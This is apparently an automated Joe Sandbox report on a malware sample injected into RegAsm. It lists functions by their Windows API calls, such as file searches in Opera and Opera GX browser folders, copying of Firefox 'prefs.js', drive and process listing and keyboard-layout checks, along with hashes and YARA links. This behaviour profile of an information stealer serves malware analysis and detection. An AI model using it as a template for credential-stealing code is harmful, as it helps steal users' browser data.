                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                            • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                            • API String ID: 3869166975-536343317
                                                                            • Opcode ID: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                            • Instruction ID: 1112d73afc027f2f7bfb5dc7aaaada1126a1c892b2eba4476be0d084da770975
                                                                            • Opcode Fuzzy Hash: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                            • Instruction Fuzzy Hash: F6424B70904288EACB15EBE5C955BDDBBB4AF19308F5040BEE409736C2DB781B4CDB66
                                                                            Function 00415843 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415848
                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                            • memset.MSVCRT ref: 004158C9
                                                                            • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                              • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                              • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                              • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                              • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                              • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                              • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                              • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                              • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                              • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                              • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                              • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                            • lstrlenA.KERNEL32(?), ref: 00415998
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                            • API String ID: 2879972474-147700698
                                                                            • Opcode ID: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                            • Instruction ID: 4715bdd0870850b2207078c54e98d1efd7a256ad646b0eee288a0e2f42291a72
                                                                            • Opcode Fuzzy Hash: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                            • Instruction Fuzzy Hash: 095170B190029CEADF30EF61DC55EEF7B7DAF05304F50003ABA15A2191DB386A89CB95
                                                                            Function 00401162 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 771fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00401167
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                            • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                            • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                            • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                            • FindClose.KERNEL32(?), ref: 00401BE5
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                              • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                              • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                              • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                              • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                            • String ID: 7$\*.*
                                                                            • API String ID: 40499504-4165053604
                                                                            • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                            • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                            • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                            • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                            Function 0040B463 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040B468
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                            • StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                            • StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                            • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F2C,?,?,00000000,00425BF3,?,00000000,?), ref: 0040B6C6
                                                                            • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                            • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                            • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                            • String ID: prefs.js
                                                                            • API String ID: 2318033617-3783873740
                                                                            • Opcode ID: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                            • Instruction ID: ee987ab292ce5c8f0602a9b5561e4dc2d57f8a603593be12f89c118a2121006c
                                                                            • Opcode Fuzzy Hash: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                            • Instruction Fuzzy Hash: D5D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB785B4CCB66
                                                                            Function 004094E5 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004094EA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425DC4,?,?,00425BA2,?), ref: 00409567
                                                                            • StrCmpCA.SHLWAPI(?,00425DC8), ref: 00409584
                                                                            • StrCmpCA.SHLWAPI(?,00425DCC), ref: 0040959E
                                                                            • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425DD0,?,?,00425BA3), ref: 00409635
                                                                            • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                              • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                            • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                            • String ID:
                                                                            • API String ID: 322284088-0
                                                                            • Opcode ID: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                            • Instruction ID: 4c01649d4d81a67c5449674785cae23a0a495e6994ebb05e8901edf346d892d0
                                                                            • Opcode Fuzzy Hash: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                            • Instruction Fuzzy Hash: 23C17270900249EADF10EBA5C9167DDBFB8AF09304F10417EE844B36C2DB785B08CBA6
                                                                            Function 0040FCE5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                            • String ID: /
                                                                            • API String ID: 2868853201-4001269591
                                                                            • Opcode ID: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                            • Instruction ID: 9e35c1e063a1b5006514c6e45779cb792778230f9907b47db8c95fc1ce32a63e
                                                                            • Opcode Fuzzy Hash: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                            • Instruction Fuzzy Hash: 5831EDB1901119EFDB10EFE5D885AEEB7B9EF48304F54407EE509B3681C7785A88CB64
                                                                            Function 004106C4 Relevance: 9.1, APIs: 6, Instructions: 67commemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004106C9
                                                                            • CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                            • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                            • _wtoi64.MSVCRT ref: 00410738
                                                                            • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                            • String ID:
                                                                            • API String ID: 1816492551-0
                                                                            • Opcode ID: 5750feebd910b0a32989819942fd3773d09ff2150041d9a27e94e8ef07c9ed3d
                                                                            • Instruction ID: 59f670c4249691ef4ccd63b580fd690aab74e6bff6ef209727d5cda1ca9931c7
                                                                            • Opcode Fuzzy Hash: 5750feebd910b0a32989819942fd3773d09ff2150041d9a27e94e8ef07c9ed3d
                                                                            • Instruction Fuzzy Hash: ED21A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64
                                                                            Function 004111BE Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004111C3
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                            • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 186290926-0
                                                                            • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                            • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                            • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                            • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                            Function 00410DAC Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
